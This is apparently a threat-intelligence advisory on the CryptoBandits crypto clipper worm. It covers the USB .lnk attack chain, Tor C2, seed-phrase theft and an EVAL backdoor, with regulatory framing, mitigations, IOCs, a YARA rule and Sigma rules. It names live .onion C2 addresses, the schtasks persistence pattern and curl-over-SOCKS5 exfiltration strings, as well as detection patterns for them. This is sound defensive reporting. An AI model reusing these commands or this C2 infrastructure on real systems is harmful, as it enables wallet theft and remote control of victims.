~/f4n6 $ grep -r "Crypto Clipper uses Tor and worm-like propagation for persistence and control" ./investigations/ --include="*.md"

Crypto Clipper uses Tor and worm-like propagation for persistence and control

Jeff Davies 18 Jun 2026 9 min read

1. Executive summary

Microsoft Threat Intelligence has documented a Windows-based cryptocurrency clipper ("CryptoBandits") active since February 2026 that propagates via malicious .lnk shortcuts on USB media and uses a bundled, renamed Tor client (ugate.exe) over a local SOCKS5 proxy (localhost:9050) to reach hidden-service .onion C2. The stealer monitors the clipboard roughly every 500 ms, harvests BIP39 seed phrases (12/24-word), Bitcoin WIF and Ethereum keys, swaps copied wallet addresses for attacker-controlled ones, exfiltrates five timed screenshots, and supports an EVAL command that executes attacker-supplied code at runtime — converting a financially motivated stealer into a lightweight backdoor. EMEA financial services firms handling crypto treasury, trading desks, or retail wallet operations face direct monetary-loss risk; back-office and developer endpoints are exposed to follow-on intrusion via the runtime EVAL channel. No CVE is associated with this campaign; the threat is delivered via removable-media social engineering rather than software exploitation.

2. Regulatory framing

Article Trigger (fact in this item) Practical impact
DORA Art. 18 — classification of ICT-related incidents and cyber threats The threat is a documented, named malware family with confirmed clipboard-theft and remote-execution capability affecting financial endpoints. Financial entities must classify any confirmed compromise as an ICT-related incident and cyber threat per their internal taxonomy; severity tiering should reflect direct monetary loss potential and the EVAL remote-execution capability.
DORA Art. 17 — ICT-related incident management process Confirmed incidents require documented detection, containment, eradication and recovery workflows. Activate the incident management process on any confirmed hit: triage chain (EDR → SOC → CISO), evidence preservation, eradication steps (see §4), and post-incident review.
DORA Art. 19 — reporting of major ICT-related incidents to competent authorities A confirmed compromise with monetary loss or service impact meets the "major" threshold under DORA reporting criteria. If a confirmed incident causes financial loss, service disruption, or affects critical operations, the entity must report to its competent authority within DORA-prescribed timelines (initial notification, intermediate, final).
DORA Art. 28 — ICT third-party risk — general principles USB-borne initial access relies on third-party-supplied removable media and hardware. Treat USB/removable-media use as a third-party risk vector; enforce device-control policy, scan removable media on insertion, and record chain-of-custody for any USB in scope.
DORA Art. 29 — preliminary assessment of ICT concentration risk The bundled Tor client (ugate.exe) and .onion C2 represent a single-vendor/single-channel concentration for both tooling and exfiltration. Include Tor/SOCKS5 egress paths and .onion resolution in concentration-risk assessments; flag any endpoint segment that lacks egress controls as high concentration.
NIS2 Art. 21(2)(d) — supply chain security measures The threat enters via the hardware supply chain (USB devices) carrying weaponised .lnk shortcuts. Apply supply-chain controls to removable media: provenance verification, scanning on mount, and user-awareness controls for unsolicited USB devices.
NIS2 Art. 23 — incident reporting obligations A confirmed incident with impact on service continuity triggers early warning / incident notification. Ensure in-scope entities have an early-warning pathway ready within 24 h of detection and a full notification within 72 h if the incident is significant.
UK NIS 2018 — OES/RDSP duties Operators of essential services in the UK financial sector handling crypto or payment services are in scope. UK OES/RDSP entities must apply the same incident-management and reporting discipline as above under the UK NIS regime.

3. Technical analysis & attack chain

  1. Initial access (USB-borne .lnk). Victim inserts a USB device containing malicious shortcut files. The worm scans for .doc, .xlsx, .pdf and other common document types, hides the originals, and creates .lnk shortcuts with the same names that masquerade as the original documents. The .lnk arguments point to the staged worm executable; the user is unaware they are launching an executable.
  2. Worm execution and payload staging. On click, the staged worm runs. It checks for an existing infection marker and stops if already infected; otherwise it fetches the payload from C2 over Tor. It excludes staging folders and Windows binaries used by the stealer from Defender scanning (MITRE: Defense Evasion — Process/Path Exclusion).
  3. Drop and persistence. Decrypted payloads (two obfuscated JavaScript files) are dropped under C:\Users\Public\Documents\<5-char-folder>\ using a five-character naming convention for both the subfolder and the script names. Two indefinite scheduled tasks are created — one for USB propagation, one for the stealer — using XML task definitions under the same five-character folder.
  4. Anti-analysis gate. The clipper queries the Win32_Process WMI class; if Task Manager is detected, the malware exits. Otherwise it launches ugate.exe (renamed portable Tor) in a hidden window and waits ~60 seconds for Tor bootstrap.
  5. C2 registration and polling. A victim GUID is generated and the device registers with a hidden-service .onion C2. The malware enters a continuous loop polling for instructions.
  6. Clipboard theft. The clipboard is inspected roughly every 500 ms. The malware detects 12- or 24-word BIP39 seed phrases, Bitcoin WIF keys, and Ethereum keys. Captured values are validated against a word list, saved locally as a backup, and exfiltrated to C2 via Tor. Local backups are deleted after successful acknowledgement.
  7. Address substitution. Copied cryptocurrency addresses are replaced with attacker-controlled addresses (validated as alphanumeric).
  8. Screenshot capture. Five screenshots are taken at ten-second intervals and uploaded asynchronously through Tor to provide wallet/balance context.
  9. Remote tasking / RCE. If the C2 returns an EVAL response, the malware executes attacker-supplied code at runtime — converting the stealer into a backdoor.
  10. Propagation. The worm component re-arms on each new USB insertion, repeating the cycle.

Technical specifics that matter to a defender

  • Script engine abuse. Execution is via WScript / CScript with ActiveXObject; the JavaScript payloads carry dual-layer obfuscation. The Python installer is obfuscated with PyArmor and packaged via PyInstaller.
  • Tor binary. ugate.exe is a renamed portable Tor client launched in a hidden window. All C2 traffic is proxied through 127.0.0.1:9050 (SOCKS5) and resolves .onion destinations inside Tor — eliminating DNS visibility for the C2 hostname.
  • Persistence mechanism. Scheduled tasks created via schtasks.exe /create /tn <4–6 char> /xml C:\Users\Public\Documents\<4–6 char>\<4–6 char>.xml /f — a distinctive pattern.
  • Exfiltration channel. curl.exe invoked with --socks5-hostname localhost:9050 against .onion destinations.
  • Defender exclusions. The malware adds Defender exclusions for its staging folder and for Windows binaries used in the stealer chain.
  • Detection names (Microsoft). AV: Trojan:Win32/CryptoBandits.A, Trojan:Win32/CryptoBandits.B, Trojan:JS/CryptoBandits.A, Trojan:JS/CryptoBandits.B. Behaviour: Behavior:Win64/PyPowJs.STA, Behavior:Win64/ProcessExclusion.ST, Behavior:Win64/PathExclusion.STA, Behavior:Win64/PathExclusion.STB, Behavior:Win64/CurlOnion.STA. EDR: "Suspicious JavaScript process", "Suspicious Python library load", "Suspicious behavior by cmd.exe", "Suspicious Task Scheduler activity", "Possible data exfiltration using curl".

Caveats

  • The source does not attribute the campaign to a named threat actor; treat any attribution as unconfirmed.
  • The source does not specify which wallet applications are targeted beyond generic BIP39/Ethereum/Bitcoin-WIF patterns.
  • The source does not state the geographic distribution of victims or the size of the campaign.

4. Mitigation & containment

P1 — within 24 hours (containment)

  1. Block Tor egress at the network perimeter. Deny outbound 127.0.0.1:9050 SOCKS5 from endpoints and outbound 9001/9030/9051 (Tor relay/directory) at the firewall. Where Tor egress is not business-justified, block .onion resolution and known Tor guard relays.
  2. Disable removable-media autorun and restrict USB. Apply device-control policy: block execution from USB; require signed/approved removable media only; quarantine any USB inserted on systems handling crypto wallets.
  3. Hunt for ugate.exe and the staging path. Sweep endpoints for ugate.exe and any folder matching C:\Users\Public\Documents\<4–6 char>\ containing <4–6 char>.xml task definitions and <4–6 char>.js payloads.
  4. Isolate suspect endpoints via EDR; preserve volatile evidence (process tree, scheduled tasks, clipboard state) before reimage.
  5. Audit scheduled tasks for the distinctive schtasks /create /tn <4–6 char> /xml C:\Users\Public\Documents\<4–6 char>\<4–6 char>.xml /f pattern; remove any matches.

P2 — within 72 hours (remediation)

  1. Apply Microsoft Defender detections (where licensed): ensure Trojan:Win32/CryptoBandits.* and Trojan:JS/CryptoBandits.* signatures are current; enable ASR rules for obfuscated scripts and suspicious child-process chains.
  2. Remove Defender exclusions added by the malware for staging folders and Windows binaries; revert any unauthorised Defender exclusions to policy defaults.
  3. Rotate any wallet material that may have been exposed on a confirmed-infected host (seed phrases, private keys, hot-wallet credentials). Treat any wallet active on an infected host as compromised.
  4. Block curl.exe invocation with --socks5-hostname via AppLocker/Windows Defender Application Control unless business-justified.
  5. Review clipboard and address-substitution telemetry on suspect hosts; check transaction history on any wallet used during the infection window for unauthorised transfers.

P3 — within 7 days (hardening)

  1. Restrict script interpreters (WScript, CScript, mshta, powershell) via ASR; require Constrained Language Mode for PowerShell where feasible.
  2. Deploy or tune a SOCKS5-on-localhost detection (see §6 Sigma rule) and alert on curl/wget/PowerShell with --socks5-hostname or .onion arguments.
  3. User awareness brief on unsolicited USB devices and on the risk of .lnk files masquerading as documents.
  4. Threat-intel feed update with the IOCs in §5 across EDR, NDR, SIEM and email/web gateways.
  5. Vendor / supply-chain review of any USB media in circulation; trace provenance and quarantine suspect batches.

5. Indicators of compromise

Type Value Confidence Source
sha256 7630debd35cac6b7d58c4427695579b3e3a8b1cc462f523234cd6c698882a68c High Microsoft (Crypto Clipper Worm)
sha256 a7abf1d9d6686af1cefcd60b17a312e7eb8cfe267def1ec34aeab6128c811630 High Microsoft (Crypto Clipper Worm)
sha256 23c1e673f315dafa14b73034a90dd3d393a984451ff6601b8be8142be6487b43 High Microsoft (Crypto Clipper Worm)
sha256 cf9fc891ea5ca5ecd8113ef3e69f6f52ff538b6cccbdaa9559106fc72bc6da30 High Microsoft (Crypto Clipper Worm)
sha256 100407796028bf3649752d9d2a67a0e4394d752eb8de86daa42920e814f3fae8 High Microsoft (Crypto Clipper Worm)
sha256 d14b80cbd1a19d4ad0473a0661297f8fdf598e81ff6c4ab24e212dcad2e54b3f High Microsoft (Crypto Clipper Worm)
sha256 9d90f54ae36c6c5435d5b8bed40faf54cc91f6db28574a6310b5ffaeb0362e96 High Microsoft (Crypto Clipper Worm)
sha256 67fc5cf395e28294bbb91ed0e954fdf2e80ebd9119022a115a42c286dc8bacf5 High Microsoft (Crypto Clipper Worm)
sha256 0020d23b0f9c5e6851a7f737af73fd143175ee47054931166369edd93338538a High Microsoft (Crypto Clipper Worm)
sha256 35a6bc44b176a050fd6824904b7604f0f45b0fdfa26bf9500b9e05973b387cfd High Microsoft (Crypto Clipper Worm)
sha256 c824630154ac4fdfce94ded01f037c305eab51e9bef3f493c60ff3184a640502 High Microsoft (Crypto Clipper Worm)
sha256 d43bf94f0cb0ab97c88113b7e07d1a4024d1610617b5ad05882b1dbab89e15ba High Microsoft (Crypto Clipper Worm)
sha256 b2777b73a4c33ac6a409d475057843be6b5d32262ef28a1f1ff5bb52e3834c5f High Microsoft (Crypto Clipper Worm)
sha256 7787a9a7d8ae393aa32f257d083903c4dc9b97a1e5b0458c4cd480d4f3cb5b05 High Microsoft (Crypto Clipper Worm)
sha256 f3b54984caca95fd496bcfe5d7db1611b08d2f5b7d250b43b430e5d76393f9e0 High Microsoft (Crypto Clipper Worm)
sha256 20db98af3037b197c8a846dbf17b87fc6f049c3e0d9a188f9b9a74d3916dd5e1 High Microsoft (Crypto Clipper Worm)
filename ugate.exe High Microsoft (portable Tor binary)
domain cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion High Microsoft (C2)
domain gfoqsewps57xcyxoedle2gd53o6jne6y5nq5eh25muksqwzutzq7b3ad.onion High Microsoft (C2)
domain he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad.onion High Microsoft (C2)
domain lyhizqy2js2eh6ufngkbzntouiikdek5zsdj3qwa22b4z6knpqorgiad.onion High Microsoft (C2)
domain j3bv7g27oramhbxxuv6gl3dcyfmf44qnvju3offdyrap7hurfprq74qd.onion High Microsoft (C2)
domain shinypogk4jjniry5qi7247tznop6mxdrdte2k6pdu5cyo43vdzmrwid.onion High Microsoft (C2)
domain 7goms4byw26kkbaanz5a5u5234gusot7rp5imzc3ozh66wwcvmcudjid.onion High Microsoft (C2)
domain facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion High Microsoft (C2)
domain wt26llpl5k6gok3vnaxmucwgzv2wk3l7nuibbh25clghrtus3p5ctsid.onion High Microsoft (C2)
domain ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion High Microsoft (C2) 
sha256  7630debd35cac6b7d58c4427695579b3e3a8b1cc462f523234cd6c698882a68c
sha256  a7abf1d9d6686af1cefcd60b17a312e7eb8cfe267def1ec34aeab6128c811630
sha256  23c1e673f315dafa14b73034a90dd3d393a984451ff6601b8be8142be6487b43
sha256  cf9fc891ea5ca5ecd8113ef3e69f6f52ff538b6cccbdaa9559106fc72bc6da30
sha256  100407796028bf3649752d9d2a67a0e4394d752eb8de86daa42920e814f3fae8
sha256  d14b80cbd1a19d4ad0473a0661297f8fdf598e81ff6c4ab24e212dcad2e54b3f
sha256  9d90f54ae36c6c5435d5b8bed40faf54cc91f6db28574a6310b5ffaeb0362e96
sha256  67fc5cf395e28294bbb91ed0e954fdf2e80ebd9119022a115a42c286dc8bacf5
sha256  0020d23b0f9c5e6851a7f737af73fd143175ee47054931166369edd93338538a
sha256  35a6bc44b176a050fd6824904b7604f0f45b0fdfa26bf9500b9e05973b387cfd
sha256  c824630154ac4fdfce94ded01f037c305eab51e9bef3f493c60ff3184a640502
sha256  d43bf94f0cb0ab97c88113b7e07d1a4024d1610617b5ad05882b1dbab89e15ba
sha256  b2777b73a4c33ac6a409d475057843be6b5d32262ef28a1f1ff5bb52e3834c5f
sha256  7787a9a7d8ae393aa32f257d083903c4dc9b97a1e5b0458c4cd480d4f3cb5b05
sha256  f3b54984caca95fd496bcfe5d7db1611b08d2f5b7d250b43b430e5d76393f9e0
sha256  20db98af3037b197c8a846dbf17b87fc6f049c3e0d9a188f9b9a74d3916dd5e1
filename  ugate.exe
domain  cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion
domain  gfoqsewps57xcyxoedle2gd53o6jne6y5nq5eh25muksqwzutzq7b3ad.onion
domain  he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad.onion
domain  lyhizqy2js2eh6ufngkbzntouiikdek5zsdj3qwa22b4z6knpqorgiad.onion
domain  j3bv7g27oramhbxxuv6gl3dcyfmf44qnvju3offdyrap7hurfprq74qd.onion
domain  shinypogk4jjniry5qi7247tznop6mxdrdte2k6pdu5cyo43vdzmrwid.onion
domain  7goms4byw26kkbaanz5a5u5234gusot7rp5imzc3ozh66wwcvmcudjid.onion
domain  facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion
domain  wt26llpl5k6gok3vnaxmucwgzv2wk3l7nuibbh25clghrtus3p5ctsid.onion
domain  ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion

6. Detection

YARA rule

rule AT_CryptoClipper_TorWorm_2026
{
    meta
    {
        author = "Adverse Trace"
        date = "2026-06-18"
        description = "Detects Crypto Clipper (CryptoBandits) worm and stealer components based on Tor binary name, .onion C2 usage, and distinctive staging path/scheduled-task pattern."
        reference = "https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/"
    }
    strings
    {
        $tor_bin = "ugate.exe" ascii wide nocase
        $onion_ext = ".onion" ascii wide nocase
        $socks_arg = "--socks5-hostname" ascii wide nocase
        $socks_proxy = "localhost:9050" ascii wide nocase
        $staging_path = "C:\\Users\\Public\\Documents\\" ascii wide nocase
        $schtasks_pat = "schtasks /create /tn " ascii wide nocase
        $schtasks_xml = "/xml C:\\Users\\Public\\Documents\\" ascii wide nocase
        $good_path = "GOOD" ascii wide
    }
    condition
    {
        $tor_bin or
        (2 of ($onion_ext, $socks_arg, $socks_proxy, $staging_path, $schtasks_pat, $schtasks_xml, $good_path))
    }
}

Sigma rule

title: Tor-Routed Curl Execution via Local SOCKS5 Proxy
id: 8c1f4a3e-2d6b-4f1a-9c7e-1a2b3c4d5e6f
status: experimental
description: |
    Detects curl.exe being invoked with --socks5-hostname against localhost:9050,
    a strong indicator of Crypto Clipper (CryptoBandits) C2/exfiltration over Tor.
author: Adverse Trace
date: 2026-06-18
reference: https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\curl.exe'
        CommandLine|contains|all:

            - '--socks5-hostname'
            - 'localhost:9050'
    condition: selection
fields:

    - User
    - Computer
    - CommandLine
    - ParentCommandLine
level: high
tags:

    - attack.command_and_control
    - attack.exfiltration
    - attack.t1090
    - attack.t1041

title: Suspicious Scheduled Task Creation in Public Documents (Crypto Clipper Pattern)
id: 7b2e5d4c-3a1f-4b8d-9e2c-5f6a7b8c9d0e
status: experimental
description: |
    Detects schtasks.exe creating a task whose XML definition lives under
    C:\Users\Public\Documents\<short>\ — the persistence pattern used by the
    Crypto Clipper worm and stealer components.
author: Adverse Trace
date: 2026-06-18
reference: https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains|all:

            - 'schtasks'
            - '/create'
            - '/tn'
            - '/xml'
            - 'C:\Users\Public\Documents\'
            - '.xml'
            - '/f'
    condition: selection
fields:

    - User
    - Computer
    - CommandLine
level: high
tags:

    - attack.persistence
    - attack.t1053.005

7. Sources

  • Microsoft Threat Intelligence — Crypto Clipper uses Tor and worm-like propagation for persistence and control — https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/ — 2026-06-17

8. Adverse Trace position

This is a financially motivated stealer with a built-in remote-execution channel, not a destructive worm — but the EVAL tasking converts clipboard theft into a foothold for follow-on intrusion, which raises impact beyond the immediate crypto loss. Severity for EMEA financial services is High for any endpoint that handles wallet material (treasury, trading, retail on-ramps, dev/ops working with hot wallets) and Medium elsewhere, given the removable-media vector and the ease of address substitution. Clients should prioritise the P1 containment steps (Tor egress block, USB restriction, hunt for ugate.exe and the C:\Users\Public\Documents\<short>\ staging path) within 24 hours and treat any wallet active on a confirmed-infected host as compromised. Adverse Trace will monitor for new .onion infrastructure, additional worm hashes, and any actor attribution; we will update this advisory if a named threat actor is confirmed or if the campaign broadens beyond USB-borne initial access.

Read the original source →

Published via PulseTrace — Adverse Trace threat intelligence.

Post this to LinkedIn
Formatting is converted automatically — headings, bullets, a link back & hashtags. Paste straight in.
J
Jeff Davies